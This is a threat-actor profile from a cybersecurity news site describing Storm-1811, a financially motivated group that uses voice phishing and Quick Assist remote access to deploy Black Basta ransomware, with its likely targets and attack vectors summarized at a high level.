Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Matrix Botnet

Storm-1811 (Cybercriminal) – Threat Actor

March 2, 2025
Reading Time: 3 mins read
in Threat Actors
Storm-1811 (Cybercriminal) – Threat Actor

Storm-1811

Date of Initial Activity

April 2024

Suspected attribution

Cybercriminal

Government Affiliation

No

Motivation

Financial Gain

Associated tools

Quick Assist
Black Basta Ransomware
Batch Files
Custom Scripts
Trojan Horse WS.Malware.2

Overview

Storm-1811 is a sophisticated threat actor known for its targeted vishing (voice phishing) campaigns, which have been observed using a variety of deceptive tactics to compromise systems. The group’s recent operations involve the misuse of the Quick Assist tool, a legitimate application designed for remote system support. By exploiting Quick Assist’s remote access capabilities, Storm-1811 can trick users into granting full control of their systems. Once access is gained, the threat actor deploys malicious scripts to initiate the download of batch files, setting the stage for a more damaging attack. The primary goal of Storm-1811’s attacks is to deploy Black Basta ransomware across the compromised network. This ransomware is known for its ability to encrypt files and disrupt organizational operations, often leading to significant data loss and financial damage. Storm-1811’s tactics reflect a high level of technical expertise and planning, as they leverage legitimate tools to bypass security measures and execute their payload.

Common targets

Storm-1811 primarily targets organizations that may have vulnerable remote access systems or insufficient cybersecurity defenses. The group’s use of Quick Assist, a tool designed for legitimate remote support, suggests a focus on entities where such tools are commonly used for troubleshooting and support purposes.

Their primary targets often include:
Small to Medium Enterprises (SMEs): These organizations might lack advanced security measures and are often seen as easier targets compared to larger corporations.

Service Providers: Companies offering IT support services, where remote access tools like Quick Assist are routinely used, can be targeted to exploit their access to multiple client systems.

Healthcare and Financial Institutions: Sectors with sensitive data are attractive due to the potential for high-impact ransomware attacks, which can disrupt operations and cause significant financial loss.

Educational Institutions: Schools and universities, which frequently use remote support tools for staff and student support, are vulnerable to such attacks.

Attack Vectors

Vishing (Voice Phishing)

Exploitation of Remote Support Tools (e.g., Quick Assist)

Social Engineering

File-based Malware (e.g., Trojan Horse WS.Malware.2)

Ransomware Deployment (e.g., Black Basta)

How they operate

Storm-1811 operates through a sophisticated approach that leverages social engineering and technical exploitation to execute their attacks. Their primary strategy involves vishing, or voice phishing, where they deceive victims into providing remote access to their systems. The group exploits legitimate remote support tools, such as Quick Assist, which are designed to facilitate troubleshooting by allowing one user to control another’s system remotely. By impersonating support personnel or using other manipulative tactics, Storm-1811 convinces the victim to grant full control of their system. Once remote access is established, Storm-1811 deploys a series of malicious scripts and batch files. These files are engineered to download and execute further malicious components, ultimately leading to the deployment of Black Basta ransomware. This ransomware encrypts files on the compromised system and demands a ransom payment for decryption. The group’s use of these techniques allows them to bypass traditional security defenses by exploiting trusted tools and leveraging social engineering. Storm-1811’s operations are characterized by their focus on exploiting vulnerabilities in remote support processes and their ability to execute complex attack sequences with minimal direct interaction. Their attacks often target organizations that use remote support tools frequently, including small to medium enterprises, service providers, and sectors with sensitive data such as healthcare and finance. By combining technical skill with psychological manipulation, Storm-1811 effectively infiltrates and disrupts their targets, making their attacks both dangerous and difficult to detect.  
References:
  • Storm-1811 threat actor conducts Vishing attack via Quick Assist tool
  • Storm-1811 using tech support scam to deploy Black Basta ransomware
Tags: Black BastaCybercriminalPhishingQuick AssistRansomwareStorm-1811Threat Actors
ADVERTISEMENT

Related Posts

CopyCop (State-Sponsored) – Threat Actor

CopyCop (State-Sponsored) – Threat Actor

March 2, 2025
Storm-0539 – Threat Actor

Storm-0539 – Threat Actor

March 2, 2025
Void Manticore (Storm-0842) – Threat Actor

Void Manticore (Storm-0842) – Threat Actor

March 2, 2025
Unfading Sea Haze – Threat Actor

Unfading Sea Haze – Threat Actor

March 2, 2025
Ikaruz Red Team – Threat Actor

Ikaruz Red Team – Threat Actor

March 2, 2025
UAC-0188 (FRwL) – Threat Actor

UAC-0188 (FRwL) – Threat Actor

March 2, 2025

Latest Alerts

Mozilla Urgent Firefox Patch Fixes RCE Flaws

ModiLoader Malware Targets Windows Users

Glibc Flaw Gives Linux Root Access Risk

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Subscribe to our newsletter

    Latest Incidents

    Massive DDoS Hits Poland’s Civic Platform

    Arla Plant Cyberattack Halts Operations

    Georgia’s Harbin Clinic Hit by Data Breach

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial